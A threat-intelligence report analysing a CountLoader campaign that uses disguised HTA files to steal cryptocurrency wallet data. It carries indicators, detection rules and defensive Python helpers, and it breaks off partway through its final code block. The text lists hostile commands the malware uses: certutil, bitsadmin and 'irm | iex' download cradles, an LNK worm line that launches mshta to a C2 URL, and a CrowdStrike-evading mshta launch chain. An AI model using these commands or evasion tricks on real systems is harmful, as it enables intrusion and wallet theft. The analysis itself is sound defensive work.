CountLoader Unmasked: 6 Polyglot HTA Files, 76 Crypto Wallets Targeted, and a Bulletproof C2 Network Hiding Behind 6 Cloudflare Accounts
TL;DR: A coordinated CountLoader campaign uploaded to MalwareBazaar on 2026-03-09 uses HTML Application (HTA) files disguised with benign extensions (.wav, .xml, .mp4, .ini, .csv) to bypass email security filters. Once executed, XOR-obfuscated JavaScript targets 76 cryptocurrency wallet browser extensions and 6 desktop hardware wallet applications -- the most comprehensive crypto wallet targeting list we have observed in a single campaign. All 5 C2 domains are registered through the same Hong Kong registrar (NiceNIC), resolve to a single AlexHost bulletproof hosting IP in Moldova (194.102.104.221), and are compartmentalized across 6 separate Cloudflare accounts. A Russian-language error string, USB worm capability, and CrowdStrike Falcon-specific evasion logic round out a campaign that is operationally mature but riddled with OPSEC failures.
The Lure: Files That Aren't What They Seem
The campaign begins with six samples, each a ~122-125 KB HTML Application file wearing a disguise. None of them use the .hta extension. Instead, the operator chose extensions that email gateways routinely allow through without inspection:
| SHA256 | Filename | Extension | Size |
|---|---|---|---|
| e867b6ea... | Travel_X_Config_917 | .wav | 124,578 |
| 4c44bd2c... | Photos_Daily_v3.0 | .xml | 124,394 |
| 4b044b4e... | Meeting_Photos_Temp_6194 | .mp4 | 123,596 |
| 084dbd55... | Europe_Dataset_Final_334 | .ini | 122,957 |
| 31ee0d6b... | Sales_Core_Data_518 | .csv | 121,363 |
| b959663a... | Omega_Data_NewYork_2087 | .xml | 125,104 |
The filenames follow a deliberate business-professional theme: travel configurations, meeting photos, sales data, European datasets. This is not random. The operator is targeting corporate users -- people who receive these kinds of attachments daily and double-click without thinking. On Windows, if the HTA handler is registered, the file opens via mshta.exe regardless of the extension. The user sees a window flicker and disappear. The infection is already underway.
The Obfuscation Stack: Four Layers Deep
Every sample is functionally identical, but no two look alike. The operator applied four distinct obfuscation layers to frustrate signature-based detection and manual analysis.
Layer 1: Extension Spoofing
The most basic and most effective layer. Email security solutions that filter by extension will pass .wav, .xml, .mp4, .ini, and .csv files without content inspection. The actual HTML content inside triggers mshta.exe on execution.
Layer 2: XOR Numeric Cipher
All strings -- C2 URLs, API endpoints, wallet extension IDs, browser paths -- are stored as integer arrays. A per-sample XOR key decodes each integer to its character code:
```javascript
var key = 576;
var setModule = [[624, 625, 626, ...], ...];
// Decoder loop: each integer XORed with the per-sample key yields one character code
result += String.fromCharCode(value ^ key);
```
Each sample uses a unique key (range: 205 to 762), meaning static signatures for decoded strings will not match across the cluster.
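As an added example (not code from the samples or the report), the Python below recovers a per-sample key by brute force over the reported 205..762 range, scoring each candidate by whether the decoded arrays become ASCII strings containing markers the page says are encoded (C2 URL, WMI class names, the Falcon process name). Because it never looks for the `key` variable, the randomized names of Layer 4 do not matter. The HTA fragment, the key 412 and the variable names are constructed; `recover_key` is a hypothetical helper.

```python
import re
import string

# Added example, not code from the CountLoader samples: brute-force the per-sample
# XOR key from the integer arrays alone, so randomized variable names do not matter.
KEY_RANGE = range(205, 763)          # key range reported for the cluster (205..762)
MARKERS = ("https://", "Win32_", "/connect", "/getUpdates", "mshta", "csfalconservice")
ASCII_PRINTABLE = set(string.printable) - set("\t\n\r\x0b\x0c")
ARRAY_RE = re.compile(r"\[(\s*\d+\s*(?:,\s*\d+\s*)*)\]")   # flat integer array literals

def xor_encode(text: str, key: int) -> list[int]:
    """Store a string the way the loader does: one integer per character, XORed with key."""
    return [ord(c) ^ key for c in text]

def decode(arr: list[int], key: int) -> str:
    return "".join(chr(v ^ key) for v in arr)

# Constructed HTA fragment (assumed key 412, meaningless variable names, a decoy literal).
_KEY = 412
CONSTRUCTED_FRAGMENT = (
    "var _q9 = [" + ", ".join(str(xor_encode(s, _KEY)) for s in (
        "https://s1-rarlab.com/connect",
        "Win32_Processor",
        "csfalconservice",
        'cmd.exe /c start "" /b mshta.exe',
    )) + "];\n"
    "var _z = 3;\n"
)

def extract_arrays(js: str) -> list[list[int]]:
    """Pull every flat integer array literal out of the script text."""
    return [[int(n) for n in m.group(1).split(",")] for m in ARRAY_RE.finditer(js)]

def score_key(arrays: list[list[int]], key: int) -> int:
    """Count arrays that decode to printable ASCII containing a known marker."""
    hits = 0
    for arr in arrays:
        s = decode(arr, key)
        if set(s) <= ASCII_PRINTABLE and any(m in s for m in MARKERS):
            hits += 1
    return hits

def recover_key(js: str) -> tuple[int, list[str]]:
    """Return the best-scoring key in KEY_RANGE and every array decoded with it."""
    arrays = extract_arrays(js)
    best = max(KEY_RANGE, key=lambda k: score_key(arrays, k))
    if score_key(arrays, best) == 0:
        raise ValueError("no key in range produces marker strings; widen KEY_RANGE")
    return best, [decode(a, best) for a in arrays]

if __name__ == "__main__":
    key, strings = recover_key(CONSTRUCTED_FRAGMENT)
    print("recovered key:", key)
    for s in strings:
        print("  ", s)
```

A wrong key with a low-bit difference still yields printable text (it just swaps cases or neighbouring characters), which is why the scorer insists on known markers rather than printability alone.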
Layer 3: Control Flow Flattening
All function bodies are wrapped in a switch/case dispatcher with randomized case ordering:
```javascript
var _order = [0, 1, 2];
var _dispatcher = 0;
while (true) {
  switch (_order[_dispatcher++]) {
    case 2: /* step 3 */ continue;
    case 0: /* step 1 */ continue;
    case 1: /* step 2 */ continue;
  }
  break;
}
```
This defeats linear code analysis and makes decompiler output nearly unreadable without reconstructing the execution order.
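An added example (not code from the samples): a small un-flattener that reads the order array and the `case` bodies and emits them in the sequence the dispatcher actually runs. The fragment is constructed, with placeholder calls as step bodies; it also permutes the order array, which goes beyond the excerpt above (where only the case ordering is shuffled), and `unflatten` is a hypothetical helper.

```python
import re

# Added example, not code from the samples: recover the execution order of a
# flattened function body whose dispatcher has the shape shown on the page.
CONSTRUCTED_FLATTENED = """
var _order = [2, 0, 1];
var _dispatcher = 0;
while (true) {
  switch (_order[_dispatcher++]) {
    case 1: fingerprintViaWmi(); continue;
    case 2: window.moveTo(-10000, -10000); continue;
    case 0: checkSandboxHostname(); continue;
  }
  break;
}
"""

DISPATCH_RE = re.compile(r"switch\s*\(\s*(\w+)\s*\[\s*\w+\s*\+\+\s*\]\s*\)")
ARRAY_DECL_RE = re.compile(r"var\s+(\w+)\s*=\s*\[([\d\s,]+)\]\s*;")
CASE_RE = re.compile(r"case\s+(\d+)\s*:\s*(.*?)\s*continue\s*;", re.S)

def unflatten(js: str) -> list[str]:
    """Return the case bodies in the order the dispatcher actually executes them."""
    m = DISPATCH_RE.search(js)
    if not m:
        raise ValueError("no switch(order[i++]) dispatcher found")
    order_name = m.group(1)
    # Only numeric-literal arrays are considered; the dispatcher's array must be one of them.
    orders = {name: [int(x) for x in body.split(",")]
              for name, body in ARRAY_DECL_RE.findall(js)}
    if order_name not in orders:
        raise ValueError(f"order array {order_name!r} not declared as a numeric literal")
    cases = {int(n): code.strip() for n, code in CASE_RE.findall(js)}
    missing = [i for i in orders[order_name] if i not in cases]
    if missing:
        raise ValueError(f"order references cases without bodies: {missing}")
    return [cases[i] for i in orders[order_name]]

if __name__ == "__main__":
    for step, code in enumerate(unflatten(CONSTRUCTED_FLATTENED), 1):
        print(f"step {step}: {code}")
```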
Layer 4: Variable Polymorphism
Function names, variable names, and array names are randomized per sample. The main decoder function appears as _runSettings in one sample, _parsePayload in another, _fetchItem in a third. Internally, every variable name differs. The functionality is byte-for-byte identical once decoded -- but automated clustering tools that rely on string matching will treat them as unrelated.
Attack Chain: From Double-Click to Crypto Drain
```text
[Email/Web Delivery]
        |
        v
[Spoofed Extension File] (.wav/.xml/.mp4/.ini/.csv)
        | User double-clicks -> Windows executes via mshta.exe
        v
[HTA Execution]
        |-- Window moved off-screen (moveTo -10000, -10000)
        |-- Sandbox detection: checks for "AZURE-PC" / "Bruno" hostnames
        |-- EDR detection: checks for CrowdStrike Falcon (csfalconservice)
        |-- System fingerprint via WMI (OS, CPU, disks, AV, domain)
        |-- Hardware ID: MD5(ProcessorId + UUID + DiskSerial)
        |
        v
[C2 Registration] POST /connect?hwid=...&os=...&av=...&wallets=...&exts=...
        | Version string: 4.1.1 | Bearer JWT auth for subsequent calls
        v
[Task Retrieval] GET /getUpdates
        |
        v
[Task Execution] -- 11 task types available
        |-- Type 1: Download & execute via ADODB.Stream
        |-- Type 2: Download & execute via rundll32
        |-- Type 3: Download & execute via msiexec (silent install)
        |-- Type 4: Self-delete (cleanup)
        |-- Type 5: Collect & exfiltrate browser data
        |-- Type 6: Download via certutil/curl/bitsadmin (LOLBIN chain)
        |-- Type 9: USB spreading (LNK worm)
        |-- Type 10: Execute arbitrary HTA via mshta.exe
        |-- Type 11: Execute PowerShell (irm | iex)
        |
        v
[Persistence]
        |-- Scheduled Task: "NVIDIA App SelfUpdate_{hash}"
        |-- Interval: every 30 minutes
        |-- Duration: 760 days (~2 years)
        |-- Runs as SYSTEM when privileges allow
```
The Anti-Analysis Gate
Before any C2 communication occurs, the HTA performs two critical checks:
- Sandbox detection -- if the hostname is `AZURE-PC` or `Bruno` (common in automated analysis sandboxes), execution stops silently
- EDR detection -- the malware enumerates running processes via `Win32_Process` and specifically searches for `csfalconservice` (CrowdStrike Falcon). When detected, it wraps subsequent execution in `cmd.exe /c start "" /b mshta.exe` -- a process chain that avoids triggering Falcon's direct `mshta.exe` child process detection rules
This is not generic anti-AV logic. The operator has specifically tested against CrowdStrike and developed a targeted bypass.
Five Download Fallbacks
The task execution engine implements five distinct download methods, tried in sequence until one succeeds:
1. VBScript MSXML2.XMLHTTP + ADODB.Stream (primary)
2. certutil.exe -urlcache -split -f (LOLBIN)
3. curl.exe -k -o (native Windows)
4. bitsadmin.exe /transfer (LOLBIN)
5. powershell.exe -ep Bypass -nop "irm | iex" (PowerShell)
This level of redundancy ensures payload delivery even when specific LOLBINs are blocked by application control policies or monitored by EDR rules.
Persistence: Impersonating NVIDIA
CountLoader creates a Windows Scheduled Task named NVIDIA App SelfUpdate_{MD5_hash} with CLSID {0830A3F8-70B8-40E1-A0F3-E0EC9092F861}. The task runs every 30 minutes with a 1-minute startup delay, and the duration is set to 760 days -- over two years. On systems where the malware has SYSTEM privileges, the task runs under the SYSTEM account. The NVIDIA naming convention is deliberate: legitimate NVIDIA software uses similar self-update task names, and administrators scanning scheduled tasks will likely skip it.
It also modifies a registry key to prevent Internet Explorer's script execution limit from killing the HTA:
HKCU\Software\Microsoft\Internet Explorer\Styles\MaxScriptStatements = 10000000 (DWORD)
The Crown Jewel: 76 Wallet Extensions
This campaign targets the most comprehensive list of cryptocurrency wallet browser extensions we have observed in a single loader. The full list spans 76 extension IDs covering every major blockchain ecosystem:
| Wallet | Extension ID | Blockchain |
|---|---|---|
| MetaMask | nkbihfbeogaeaoehlefnkodbefgpgknn | Ethereum/EVM |
| Phantom | bfnaelmomeimhlpmgjnjophhpkkoljpa | Solana |
| Rabby Wallet | acmacodkjbdgmoleebolmdjonilkdbch | Ethereum/EVM |
| Coinbase Wallet | hnfanknocfeofbddgcijnmhnfnkdnaad | Multi-chain |
| Keplr | dmkamcknogkgcdfhhbddcghachkejeap | Cosmos |
| TronLink | ibnejdfjmmkpcnlpebklmnkoeoihofec | Tron |
| Trust Wallet | aflkmfhebedbjioipglgcbcmnbpgliof | Multi-chain |
| OKX Wallet | mcohilncbfahbmgdjkbpemcciiolgcge | Multi-chain |
| Core | fcfcfllfndlomdhbehjjcoimbgofdncg | Avalanche |
| UniSat | khpkpbbcccdmmclmpigdgddabeilkdpd | Bitcoin/Ordinals |
| Tonkeeper | ldcoohedfbjoobcadoglnnmmfbdlmmhf | TON |
| Eternl | efbglgofoippbgcjepnhiblaibcnclgk | Cardano |
| Argent X | dlcobpjiigpikoobohmabehhmhfoodbb | StarkNet |
| Sui Wallet | jnlgamecbpmbajjfhmmmlhejkemejdma | Sui |
Plus 62 more, including Solflare, Leap, Temple, XDEFI, SafePal, Talisman, SubWallet, Math Wallet, NAMI, Blade, Casper, and 36 unidentified extension IDs that likely correspond to newer or regional wallet projects.
The campaign also targets 6 desktop hardware wallet applications by searching well-known installation paths:
| Application | Search Path |
|---|---|
| Ledger Live | %ProgramFiles%\Ledger Live, %APPDATA%\Programs\ledger-live |
| Trezor | %APPDATA%\@trezor |
| Exodus | %APPDATA%\Exodus |
| Atomic Wallet | %APPDATA%\atomic |
| Guarda | %APPDATA%\Guarda |
| KeepKey / BitBox02 | %APPDATA%\KeepKey, %APPDATA%\BitBox02 |
Browser data theft covers 66 Chromium-based browsers, from mainstream (Chrome, Edge, Brave, Opera, Vivaldi) to regional (Yandex, QQBrowser, SogouExplorer, CocCoc, 360Browser, Naver Whale) and niche (Torch, CentBrowser, Slimjet, SRWare Iron, K-Meleon, Liebao, Amigo).
USB Worm: Spreading Through Removable Media
Task type 9 activates a USB spreading module that enumerates removable drives via WMI and searches for .exe, .docx, .pdf, and .doc files up to 2 directories deep. For each file found, the worm:
- Hides the original file with `attrib +hidden`
- Creates a `.lnk` shortcut with the original filename
- The shortcut executes: `cmd.exe /c start original.exe & start mshta [C2_URL]`
The user sees what appears to be their original file. They double-click it. The original file opens normally -- and the HTA payload silently executes in the background. This is a classic technique (T1091) that remains effective in environments where USB drives are still used for file sharing.
The USB spreading code contains the string "Ошибка: " (Russian for "Error:"), the only human-language artifact in the entire codebase.
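An added triage check (not code from the report) for the LNK replacement pattern just described: it pairs each `.lnk` whose embedded arguments carry the `cmd.exe /c start ... & start mshta` chain with the hidden original it shadows in the same folder. Detection runs on a listing abstraction so a constructed listing can be checked offline; `scan_drive` builds a real listing on Windows using the hidden attribute. File names, shortcut bytes (not real shortcut structures) and the C2 placeholder are all constructed, and the helper names are hypothetical.

```python
import os
import stat
from dataclasses import dataclass

# Added example, not from the report: triage a removable drive for the worm's
# hidden-original + .lnk replacement pattern. Names and bytes are constructed.
TARGET_EXT = (".exe", ".docx", ".pdf", ".doc")   # extensions the worm replaces
# Shortcut argument strings are stored as UTF-16LE inside a .lnk file.
LNK_MARKERS = [s.encode("utf-16-le") for s in ("cmd.exe /c start", "mshta")]

@dataclass
class Entry:
    path: str            # path relative to the drive root, forward slashes
    hidden: bool
    data: bytes = b""    # file contents; only read for .lnk files

def lnk_args_suspicious(data: bytes) -> bool:
    """True when the shortcut carries the worm's 'start original & start mshta' chain."""
    return all(m in data for m in LNK_MARKERS)

def find_lnk_replacements(entries: list[Entry]) -> list[tuple[str, str]]:
    """Pair each suspicious .lnk with the hidden original it shadows (same folder, same stem)."""
    by_path = {e.path.lower(): e for e in entries}
    findings = []
    for e in entries:
        if not e.path.lower().endswith(".lnk") or not lnk_args_suspicious(e.data):
            continue
        stem = e.path[:-4]                           # "docs/report.pdf.lnk" -> "docs/report.pdf"
        for cand in [stem] + [stem + ext for ext in TARGET_EXT]:   # also "setup.lnk" -> "setup.exe"
            orig = by_path.get(cand.lower())
            if orig and orig.hidden and cand.lower().endswith(TARGET_EXT):
                findings.append((e.path, orig.path))
                break
    return findings

def scan_drive(root: str, max_depth: int = 2) -> list[Entry]:
    """Walk a drive root (mirroring the worm's 2-level depth) into Entry records."""
    entries = []
    for dirpath, dirnames, filenames in os.walk(root):
        rel = os.path.relpath(dirpath, root)
        depth = 0 if rel == "." else rel.count(os.sep) + 1
        if depth >= max_depth:
            dirnames[:] = []                         # do not descend further
        for name in filenames:
            full = os.path.join(dirpath, name)
            st = os.stat(full)                       # st_file_attributes exists on Windows only
            hidden = bool(getattr(st, "st_file_attributes", 0) & stat.FILE_ATTRIBUTE_HIDDEN)
            data = open(full, "rb").read() if name.lower().endswith(".lnk") else b""
            entries.append(Entry(os.path.relpath(full, root).replace(os.sep, "/"), hidden, data))
    return entries

def constructed_listing() -> list[Entry]:
    """A drive listing after the worm has run, plus a benign shortcut as a control."""
    worm_lnk = b"L\x00\x00\x00" + "cmd.exe /c start report.pdf & start mshta https://C2-PLACEHOLDER/".encode("utf-16-le")
    benign_lnk = b"L\x00\x00\x00" + "notepad.exe notes.docx".encode("utf-16-le")
    return [
        Entry("docs/report.pdf", hidden=True),
        Entry("docs/report.pdf.lnk", hidden=False, data=worm_lnk),
        Entry("setup.exe", hidden=True),
        Entry("setup.lnk", hidden=False, data=worm_lnk),
        Entry("notes.docx", hidden=False),
        Entry("notes.docx.lnk", hidden=False, data=benign_lnk),
    ]

if __name__ == "__main__":
    for lnk, original in find_lnk_replacements(constructed_listing()):
        print(f"{lnk} shadows hidden {original}")
```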
Infrastructure: One IP, Five Domains, Six Cloudflare Accounts
All roads lead to 194.102.104.221.
The Single Point of Failure
```text
AlexHost SRL (AS200019) -- Bulletproof Hosting, Chisinau, Moldova
  |
  +-- 194.102.104.0/23 (CLOUDATAMD-MNT)
        |
        +-- 194.102.104.221 (rDNS: mail.wooryy.com)
              |
              +-- [Cloudflare Proxy Layer]
                    |
                    +-- s1-rarlab.com (arnold/melinda CF pair)
                    +-- magnusworkspace.com (gigi/harlan CF pair)
                    +-- web3-walletnotify.cc (alice/venkat CF pair)
                    +-- s3-python.cc (daisy/steven CF pair)
                    +-- node1-py-store.com (elliot/lisa CF pair)
                    +-- node2-py-store.com (kayden/liz CF pair)
```
Five C2 domains, all registered through NiceNIC International Group (a Hong Kong registrar favored by Russian-speaking threat actors), all resolving to a single IP at AlexHost -- a Moldovan hosting provider with a well-documented reputation as bulletproof infrastructure.
Deliberate Compartmentalization
The operator created six separate Cloudflare accounts (each with its own nameserver pair) across the six domains. This is not accidental. If one domain is reported to Cloudflare and the associated account is suspended, the remaining five continue operating. The operator treats Cloudflare accounts as disposable infrastructure.
Domain Naming Strategy
The domains follow three distinct impersonation themes:
| Theme | Domains | Mimicking |
|---|---|---|
| WinRAR | s1-rarlab[.]com | rarlab.com (WinRAR's official site) |
| Python ecosystem | node1-py-store[.]com, s3-python[.]cc | PyPI / Python package infrastructure |
| Crypto/Web3 | web3-walletnotify[.]cc | Web3 wallet notification service |
| Corporate | magnusworkspace[.]com | Generic corporate workspace tool |
The s{N}-rarlab.com and node{N}-py-store.com patterns suggest DGA-like templating -- the operator can spin up s2-rarlab.com, s3-rarlab.com, node3-py-store.com as needed.
Certificate Timing Reveals Coordination
All domains use Let's Encrypt certificates (E7/E8 issuers). Every certificate was issued or renewed on 2026-03-09 -- the same day the samples appeared on MalwareBazaar:
| Domain | First Certificate | Renewed |
|---|---|---|
| s1-rarlab[.]com | 2026-02-19 | 2026-03-09 |
| magnusworkspace[.]com | 2026-02-23 | 2026-03-09 |
| web3-walletnotify[.]cc | 2026-02-18 | 2026-03-09 |
| s3-python[.]cc | 2025-12-16 | 2026-03-09 |
| node1-py-store[.]com | 2025-10-20 (est.) | 2026-03-09 |
Same-day certificate renewal across all domains confirms a single operator managing the entire cluster. This is a significant OPSEC failure -- the timing correlation alone is sufficient to link domains that would otherwise appear unrelated.
The rDNS Breadcrumb
The reverse DNS record on 194.102.104.221 points to mail.wooryy.com -- a hostname that predates the CountLoader campaign and likely belongs to a previous or concurrent operation by the same actor. This is another attribution thread that has not been publicly documented.
OPSEC Failures
Despite the operational maturity of the obfuscation and evasion techniques, the operator made several mistakes:
- Russian error string -- `"Ошибка: "` in the USB spreading code reveals the developer's native language
- Single C2 IP -- all 5 domains resolve to one IP; takedown of `194.102.104.221` kills the entire operation
- Single registrar -- all domains registered through NiceNIC; an account-level takedown is feasible
- Coordinated cert renewal -- same-day Let's Encrypt renewal across all domains creates an unmistakable correlation
- Reverse DNS leak -- `mail.wooryy.com` on the C2 IP links to a separate operation
- Hardcoded version string -- `4.1.1` appears in every sample's C2 registration beacon, enabling version tracking across future campaigns
Task Key Campaign Tracking
Each sample carries a unique 20-character alphanumeric task key sent during C2 registration. These keys likely map to individual distribution channels, allowing the operator to track which delivery vector (email campaign, website, USB spread) produced each infection:
```text
KWOAIZ1XAX03P0JU1QUL -> s1-rarlab.com        (Meeting_Photos_Temp_6194.mp4)
9W4E5X479DUU8QDGM79E -> magnusworkspace.com  (Travel_X_Config_917.wav)
283WPHNCNVFZAS3ELWE3 -> web3-walletnotify.cc (Photos_Daily_v3.0.xml)
D4LP25W30CJUNCW31I0Y -> web3-walletnotify.cc (Sales_Core_Data_518.csv)
35TBIP4RKAOLMH0ISYO2 -> node1-py-store.com   (Europe_Dataset_Final_334.ini)
94X3WTCDSM0KQ10ATQEH -> s3-python.cc         (Omega_Data_NewYork_2087.xml)
```
Note that web3-walletnotify[.]cc has two task keys assigned to two different samples, suggesting it serves as the primary C2 domain with multiple active distribution streams.
MITRE ATT&CK Mapping
| Tactic | Technique | ID | Implementation |
|---|---|---|---|
| Initial Access | Phishing: Spearphishing Attachment | T1566.001 | HTML files with spoofed extensions via email |
| Execution | User Execution: Malicious File | T1204.002 | User double-clicks .wav/.xml/.mp4/.ini/.csv file |
| Execution | Signed Binary Proxy Execution: Mshta | T1218.005 | HTA execution via mshta.exe |
| Execution | Command and Scripting Interpreter: JavaScript | T1059.007 | XOR-obfuscated JS in HTA body |
| Execution | Command and Scripting Interpreter: VBScript | T1059.005 | Embedded VBScript for ADODB.Stream downloads |
| Execution | Command and Scripting Interpreter: PowerShell | T1059.001 | PowerShell download cradle (irm / iex) |
| Persistence | Scheduled Task/Job: Scheduled Task | T1053.005 | "NVIDIA App SelfUpdate_{hash}", 30-min interval, 760-day duration |
| Defense Evasion | Obfuscated Files or Information | T1027 | XOR cipher, control flow flattening, polymorphic variable names |
| Defense Evasion | Masquerading: Match Legitimate Name | T1036.005 | NVIDIA task name, WinRAR/Python domain impersonation |
| Defense Evasion | System Binary Proxy Execution: Certutil | T1218 | certutil.exe for payload download |
| Defense Evasion | System Binary Proxy Execution: Msiexec | T1218.007 | msiexec.exe /quiet for silent installs |
| Defense Evasion | BITS Jobs | T1197 | bitsadmin.exe for payload download |
| Defense Evasion | Indicator Removal: File Deletion | T1070.004 | Self-deletion via task type 4 |
| Discovery | System Information Discovery | T1082 | WMI enumeration: OS, CPU, disks, AV, domain |
| Discovery | Security Software Discovery | T1518.001 | AntiVirusProduct WMI query, CrowdStrike process check |
| Discovery | Process Discovery | T1057 | Win32_Process enumeration for EDR detection |
| Discovery | Peripheral Device Discovery | T1120 | USB/removable drive enumeration via WMI |
| Collection | Data from Local System | T1005 | Browser extension data, wallet application files |
| Lateral Movement | Replication Through Removable Media | T1091 | USB LNK replacement worm |
| Command and Control | Application Layer Protocol: Web | T1071.001 | HTTPS C2 with Bearer JWT authentication |
| Command and Control | Encrypted Channel | T1573.002 | HTTPS via Cloudflare proxy |
| Command and Control | Domain Generation Algorithms | T1568.002 | s{N}-rarlab.com, node{N}-py-store.com patterns |
| Exfiltration | Exfiltration Over C2 Channel | T1041 | Wallet/browser data sent to C2 via HTTPS POST |
Indicators of Compromise
Network Indicators
C2 Domains:
s1-rarlab[.]com
magnusworkspace[.]com
web3-walletnotify[.]cc
s3-python[.]cc
node1-py-store[.]com
node2-py-store[.]com
C2 IP:
194.102.104.221
Related Hostname:
mail.wooryy[.]com
File Indicators
| SHA256 | Filename | Size |
|---|---|---|
| e867b6eab9ca3475cbed6f14d3eaab2ce742b22e7390c62c1185024aca62e11f | Travel_X_Config_917.wav | 124,578 |
| 4c44bd2ce55eb22ff1dbe90e47282cc6cbb7c2697d6210630559448af7ebe14d | Photos_Daily_v3.0.xml | 124,394 |
| 4b044b4e9eec63f249e5e8fa4276948cf8002fff4d67b9c80532c7500694fd03 | Meeting_Photos_Temp_6194.mp4 | 123,596 |
| 084dbd5563fb9b83793957c0ee176d38b1129987eeb5f922f27606f52c0c8be4 | Europe_Dataset_Final_334.ini | 122,957 |
| 31ee0d6b90096506ef3d336531903cdb8688a05086dd70b2c4e580b62181ddb3 | Sales_Core_Data_518.csv | 121,363 |
| b959663a61d0725bcd0213e3a66a44505f7c51d1595e4070c93778ef22c9db36 | Omega_Data_NewYork_2087.xml | 125,104 |
Behavioral Indicators
Scheduled Task:
Name: NVIDIA App SelfUpdate_{MD5_hash}
CLSID: {0830A3F8-70B8-40E1-A0F3-E0EC9092F861}
Interval: PT30M
Duration: P760D
Delay: PT1M
Registry Modification:
Key: HKCU\Software\Microsoft\Internet Explorer\Styles\MaxScriptStatements
Value: 10000000 (DWORD)
C2 Protocol:
Registration: POST /connect?hwid={md5}&os={os}&av={av}&version=4.1.1&key={task_key}&wallets={list}&exts={list}
Task poll: GET /getUpdates (Bearer JWT)
Module pull: GET /getModule?name={name}
Completion: GET /approveUpdate?id={id}
Campaign Task Keys:
KWOAIZ1XAX03P0JU1QUL
9W4E5X479DUU8QDGM79E
283WPHNCNVFZAS3ELWE3
D4LP25W30CJUNCW31I0Y
35TBIP4RKAOLMH0ISYO2
94X3WTCDSM0KQ10ATQEH
Detection Opportunities
YARA Rules
```yara
rule CountLoader_HTA_XOR_Polyglot {
    meta:
        description = "Detects CountLoader HTA files with XOR-obfuscated JS and spoofed extensions"
        author = "Breakglass Intelligence"
        date = "2026-03-09"
        tlp = "TLP:CLEAR"
        severity = "HIGH"
        reference = "https://intel.breakglass.tech"
    strings:
        $hta_tag = "<HTA:APPLICATION" ascii nocase
        $xor_pattern = "String.fromCharCode" ascii
        $cff1 = "switch" ascii
        $cff2 = "continue" ascii
        $cff3 = "dispatcher" ascii nocase
        $wmi1 = "Win32_Processor" ascii
        $wmi2 = "Win32_ComputerSystemProduct" ascii
        $wmi3 = "Win32_DiskDrive" ascii
        $sandbox1 = "AZURE-PC" ascii
        $sandbox2 = "Bruno" ascii
        $edr = "csfalconservice" ascii nocase
    condition:
        filesize < 200KB and
        $hta_tag and $xor_pattern and
        2 of ($cff*) and
        2 of ($wmi*) and
        (1 of ($sandbox*) or $edr)
}

rule CountLoader_NVIDIA_Persistence {
    meta:
        description = "Detects CountLoader scheduled task persistence via NVIDIA impersonation"
        author = "Breakglass Intelligence"
        date = "2026-03-09"
        tlp = "TLP:CLEAR"
        severity = "MEDIUM"
    strings:
        $task_name = "NVIDIA App SelfUpdate_" ascii wide
        $clsid = "{0830A3F8-70B8-40E1-A0F3-E0EC9092F861}" ascii wide nocase
        $duration = "P760D" ascii wide
        $interval = "PT30M" ascii wide
    condition:
        2 of them
}

rule CountLoader_USB_Worm {
    meta:
        description = "Detects CountLoader USB LNK spreading component"
        author = "Breakglass Intelligence"
        date = "2026-03-09"
        tlp = "TLP:CLEAR"
        severity = "HIGH"
    strings:
        $ru_error = { D0 9E D1 88 D0 B8 D0 B1 D0 BA D0 B0 3A 20 } // "Ошибка: " UTF-8
        $lnk_cmd = "cmd.exe /c start" ascii wide
        $mshta = "mshta" ascii wide
        $attrib = "attrib" ascii wide
        $hidden = "+hidden" ascii wide nocase
    condition:
        $ru_error or
        (3 of ($lnk_cmd, $mshta, $attrib, $hidden))
}
```
Snort/Suricata Rules
```suricata
# CountLoader C2 — Known domains
alert dns any any -> any any (msg:"COUNTLOADER C2 Domain Resolution"; \
    dns.query; content:"rarlab.com"; \
    pcre:"/s\d+-rarlab\.com/"; \
    sid:2026030901; rev:1;)
alert dns any any -> any any (msg:"COUNTLOADER C2 Domain Resolution"; \
    dns.query; content:"py-store.com"; \
    pcre:"/node\d+-py-store\.com/"; \
    sid:2026030902; rev:1;)
alert dns any any -> any any (msg:"COUNTLOADER C2 Domain Resolution"; \
    dns.query; content:"web3-walletnotify.cc"; \
    sid:2026030903; rev:1;)
alert dns any any -> any any (msg:"COUNTLOADER C2 Domain Resolution"; \
    dns.query; content:"s3-python.cc"; \
    sid:2026030904; rev:1;)
alert dns any any -> any any (msg:"COUNTLOADER C2 Domain Resolution"; \
    dns.query; content:"magnusworkspace.com"; \
    sid:2026030905; rev:1;)

# CountLoader C2 — Registration beacon pattern
alert http any any -> any any (msg:"COUNTLOADER C2 Registration Beacon"; \
    content:"/connect?"; http_uri; content:"hwid="; http_uri; \
    content:"version=4.1.1"; http_uri; content:"wallets="; http_uri; \
    sid:2026030906; rev:1;)

# CountLoader — mshta.exe spawned from cmd.exe (EDR bypass pattern)
# "any" is not a valid protocol keyword in Suricata; "ip" matches all IP traffic.
alert ip any any -> any any (msg:"COUNTLOADER CrowdStrike Bypass - cmd mshta chain"; \
    content:"cmd.exe"; content:"/c start"; content:"/b mshta.exe"; \
    sid:2026030907; rev:1;)
```
Hunting Queries
Scheduled Task Hunt (PowerShell):
```powershell
Get-ScheduledTask | Where-Object { $_.TaskName -like "NVIDIA App SelfUpdate_*" } |
    Select-Object TaskName, TaskPath, State, @{N='Actions';E={$_.Actions.Execute}}
```
Registry Hunt:
```powershell
Get-ItemProperty -Path "HKCU:\Software\Microsoft\Internet Explorer\Styles" -Name MaxScriptStatements -ErrorAction SilentlyContinue
```
Process Hunt -- mshta.exe with suspicious parent:
```text
parent_process_name:cmd.exe AND process_name:mshta.exe AND
process_command_line:("/c start" AND "/b mshta.exe")
```
Network Hunt -- C2 registration beacon:
```text
url.path:"/connect" AND url.query:("hwid=" AND "version=4.1.1" AND "wallets=")
```
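An added example (not code from the report) that turns the hunts above, the five download fallbacks and the `cmd.exe /c start "" /b mshta.exe` launch chain into Python predicates, run over constructed process-creation events and proxy URLs. The event fields, the sample command lines and the query values are assumptions modelled on the behaviours described on this page; `classify_process` and `classify_url` are hypothetical helpers.

```python
import re
from dataclasses import dataclass
from urllib.parse import parse_qs, urlsplit

# Added example, not from the report: the page's hunts as predicates over
# constructed process-creation events and URLs (field names are assumptions).
@dataclass
class ProcEvent:
    parent_image: str
    parent_cmdline: str
    image: str
    cmdline: str

SPOOFED_HTA_ARG = re.compile(r'\S+\.(?:wav|xml|mp4|ini|csv)"?(?:\s|$)', re.I)
IRM_IEX = re.compile(r"\birm\b.*\|\s*iex\b", re.I)

def classify_process(ev: ProcEvent) -> list[str]:
    """Names of the CountLoader behaviours one process-creation event matches."""
    hits, image, parent = [], ev.image.lower(), ev.parent_image.lower()
    cl, pcl, toks = ev.cmdline.lower(), ev.parent_cmdline.lower(), ev.cmdline.lower().split()
    if image == "mshta.exe":
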